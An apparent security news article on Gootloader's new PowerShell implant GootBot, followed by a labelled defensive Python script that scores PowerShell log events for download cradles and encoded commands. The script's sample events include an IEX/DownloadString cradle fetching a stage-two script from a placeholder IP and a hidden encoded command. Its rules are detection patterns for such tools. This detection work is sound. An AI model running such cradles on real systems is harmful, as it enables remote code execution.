The creators of Gootloader, a malicious program commonly used to deploy ransomware and other malware threats on enterprise networks, have developed a new second-stage implant. Dubbed GootBot, the new post-exploitation tool is written in PowerShell and is pushed to other systems on compromised networks via lateral movement techniques.

“The Gootloader group's introduction of their own custom bot into the late stages of their attack chain is an attempt to avoid detections when using off-the-shelf tools for C2 [command-and-control] such as CobaltStrike or RDP,” researchers from IBM X-Force said in a new report. “This new variant is a lightweight but effective malware allowing attackers to rapidly spread throughout the network and deploy further payloads.”

Initial access and post-exploitation

The Gootloader group, tracked as Hive0127 by X-Force or UNC2565 by Mandiant, has operated for many years, initially by developing and spreading a trojan program called Gootkit that was focused on stealing online banking credentials. Gootloader is the group’s first-stage component — or malware loader — that was used to deploy Gootkit on infected systems.

Like TrickBot and other banking trojan creators, the Gootkit developers joined the lucrative ransomware ecosystem several years ago and pivoted from stealing and selling online banking credentials to on-demand deployment of malicious payloads for other cybercriminals. For example, the Gootloader group had a notable partnership with the now defunct REvil ransomware gang.

As a provider of initial access services, the Gootloader component became far more important to the group’s operations than the Gootkit trojan itself, so the group began deploying other second-stage implants such as Cobalt Strike, a commercial penetration testing tool that provides persistent access to compromised systems and command-and-control (C2) capabilities.

First-stage malware loaders such as Gootloader are usually lightweight programs or scripts whose job is to collect basic information about the infected system, download secondary payloads from hardcoded locations, and deploy them. They typically lack advanced C2 mechanisms that allow back-and-forth communication with attackers and on-demand command execution.
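Because both the loader stage described above and the new GootBot implant rely on PowerShell to fetch and run further payloads, a defender's first practical question is how to surface that behaviour in telemetry. The following Python script is an added example written for this page; it is not code from IBM X-Force, from the article, or from any Gootloader sample. It scores constructed PowerShell script-block events (shaped loosely like Windows Event ID 4104 records) against generic download-cradle and obfuscation indicators, decoding any `-EncodedCommand` payload so that indicators hidden inside base64 are still counted. The event contents, the rule set and the weights are all assumptions chosen for illustration, not Gootloader-specific signatures.

```python
import base64
import binascii
import re
from typing import Dict, List

# Constructed PowerShell script-block events (NOT real Gootloader/GootBot
# samples). Field names only mimic the shape of Event ID 4104 records.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "ws01", "user": "alice",
     "script": "Get-ChildItem C:\\Users\\alice\\Documents"},
    {"host": "ws02", "user": "bob",
     "script": "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage2.ps1')"},
    # The base64 below is UTF-16LE for "IEX (New-Object" (constructed).
    {"host": "ws03", "user": "svc",
     "script": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"host": "ws04", "user": "carol",
     "script": "Invoke-WebRequest -Uri https://intranet.example/report.csv -OutFile report.csv"},
]

# -EncodedCommand (and its -e / -enc short forms) followed by a base64 blob.
ENCODED_RE = re.compile(r"-e(nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)

# (rule name, pattern, weight). Generic PowerShell indicators; weights are an
# assumed scoring scheme, not a published one.
RULES = [
    ("download_cradle",
     re.compile(r"(Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bcurl\b)", re.I), 2),
    ("inline_execution", re.compile(r"\b(IEX|Invoke-Expression)\b", re.I), 3),
    ("encoded_command", ENCODED_RE, 3),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden", re.I), 1),
    ("no_profile", re.compile(r"-nop\b|-noprofile\b", re.I), 1),
    ("raw_ip_url", re.compile(r"https?://\d{1,3}(\.\d{1,3}){3}", re.I), 2),
]


def decode_encoded_command(script: str) -> str:
    """Return the decoded -EncodedCommand payload, or '' if none/undecodable."""
    match = ENCODED_RE.search(script)
    if not match:
        return ""
    try:
        # PowerShell encodes the command as base64 over UTF-16LE text.
        return base64.b64decode(match.group(2)).decode("utf-16-le", errors="ignore")
    except (binascii.Error, ValueError):
        return ""


def analyze_script(script: str) -> Dict[str, object]:
    """Score one script block; indicators found inside a decoded payload count too."""
    hits = {name for name, pattern, _ in RULES if pattern.search(script)}
    decoded = decode_encoded_command(script)
    if decoded:
        hits |= {name for name, pattern, _ in RULES
                 if name != "encoded_command" and pattern.search(decoded)}
    score = sum(weight for name, _, weight in RULES if name in hits)
    return {"score": score, "hits": sorted(hits), "decoded": decoded}


def triage(events: List[Dict[str, str]], threshold: int = 4) -> List[Dict[str, object]]:
    """Return events whose score meets the threshold, highest score first."""
    flagged = []
    for event in events:
        result = analyze_script(event["script"])
        if result["score"] >= threshold:
            flagged.append({"host": event["host"], "user": event["user"], **result})
    return sorted(flagged, key=lambda r: r["score"], reverse=True)


if __name__ == "__main__":
    for row in triage(SAMPLE_EVENTS):
        print(f"{row['host']:5} {row['user']:6} score={row['score']} hits={row['hits']}")
```

The intranet download on `ws04` scores below the threshold on purpose: a single `Invoke-WebRequest` to an internal host is routine administration, and a detection that fires on it alone produces more noise than signal. The combination of a download, in-memory execution and a raw-IP URL, or of an encoded command with a hidden window, is what pushes an event over the line. In production the same logic would run over real script-block logging and be correlated with process ancestry and network telemetry rather than scored in isolation.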